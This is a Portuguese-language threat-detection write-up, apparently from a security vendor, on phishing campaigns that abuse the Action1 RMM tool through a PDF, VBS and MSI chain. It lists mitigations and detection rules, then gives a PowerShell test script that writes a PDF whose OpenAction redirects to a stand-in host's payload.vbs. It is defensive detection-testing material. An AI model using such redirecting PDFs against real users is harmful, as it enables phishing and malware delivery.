Abuso de Ferramentas RMM Continua a Crescer em Campanhas de Ameaças Ativas
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Os agentes de ameaça estão abusando de ferramentas de Gerenciamento e Monitoramento Remoto (RMM), particularmente do Action1, para estabelecer acesso persistente em ambientes comprometidos. O ataque começa com um e-mail de phishing contendo um PDF malicioso que redireciona as vítimas para um arquivo VBS. O script então baixa e instala um pacote MSI contendo o agente legítimo Action1, permitindo acesso remoto não autorizado.
Investigação
A investigação descobriu um PDF malicioso que utiliza as palavras-chave OpenAction e URI para iniciar um download de uma URL hospedada na Vercel. A análise do pacote MSI recuperado revelou arquivos legítimos da Action1 Corporation sendo usados indevidamente através da infraestrutura em nuvem do próprio fornecedor. O agente instalado contém um CustomerID específico e se comunica com um domínio legítimo do Action1.
Mitigação
As organizações devem configurar o filtro de e-mail para identificar estruturas de PDF suspeitas contendo as palavras-chave OpenAction ou URI. As equipes de segurança devem monitorar instalações não autorizadas de ferramentas RMM e a criação do serviço A1Agent. Bloquear conexões para infraestrutura em nuvem RMM inesperada e identificar CustomerIDs incomuns ou não autorizados pode reduzir ainda mais o risco de abuso de acesso remoto.
Resposta
Quando uma atividade maliciosa de RMM é detectada, isole o host afetado para evitar a execução de comandos remotos adicionais. Investigue o e-mail de phishing original e conduza uma análise forense dos arquivos VBS e MSI associados. Revogue credenciais potencialmente comprometidas e revise as configurações do agente Action1 em busca de indicadores de acesso remoto ou persistência não autorizados.
Fluxo de Ataque
Ainda estamos atualizando esta parte.
Detecções
LOLBAS WScript / CScript (via criação de processo)
Software Alternativo de Acesso Remoto / Gerenciamento (via criação de processo)
Possível Infiltração / Exfiltração de Dados / C2 via Serviços / Ferramentas de Terceiros (via proxy)
Possível Infiltração / Exfiltração de Dados / C2 via Serviços / Ferramentas de Terceiros (via dns)
Possível Atividade de Comando e Controle por Tentativa de Comunicação de Domínio de Software de Acesso Remoto (via dns)
IOCs (HashSha256) para detectar: Mais Ferramentas RMM à solta
Conexão Remota aos Servidores Corporativos Action1 [Conexão de Rede do Windows]
Redirecionamento de OpenAction e URI em PDF para VBS Malicioso [Evento de Arquivo do Windows]
Execução da Simulação
-
Narrativa e Comandos do Ataque: O adversário está simulando uma campanha de phishing. O objetivo é entregar um arquivo nomeado
Recibo de Transação .pdfpara uma vítima. O PDF é especialmente criado para que, assim que o usuário o abra, o/OpenActioncomando acione um/URIredirecionamento. Este redirecionamento é projetado para levar o usuário a um site que serve um VBScript malicioso. Para acionar a regra de detecção específica fornecida, criaremos um arquivo com o nome e strings internas exatos requeridos. -
Script de Teste de Regressão:
# Script de Simulação: Acionando a Detecção de OpenAction em PDF $targetFile = "$env:USERPROFILEDesktopRecibo de Transação .pdf" # Criando o conteúdo "malicioso" em PDF para coincidir com as palavras-chave de detecção $pdfContent = @" %PDF-1.1 1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction << /S /URI /URI (http://malicious-site.com/payload.vbs) >> >> endobj 2 0 obj << /Type /Pages /Parent 1 0 R /Count 1 >> endobj trailer << /Root 1 0 R >> %%EOF "@ # Gravando o arquivo no disco para acionar a detecção de 'file_event' $pdfContent | Out-File -FilePath $targetFile -Encoding ascii Write-Host "Arquivo de simulação criado em: $targetFile" Write-Host "Verifique seu SIEM para o alerta de detecção." -
Comandos de Limpeza:
# Limpeza: Remover o arquivo malicioso simulado $targetFile = "$env:USERPROFILEDesktopRecibo de Transação .pdf" if (Test-Path $targetFile) { Remove-Item -Path $targetFile -Force Write-Host "Limpeza concluída: $targetFile removido." } else { Write-Host "Limpeza: Arquivo não encontrado." }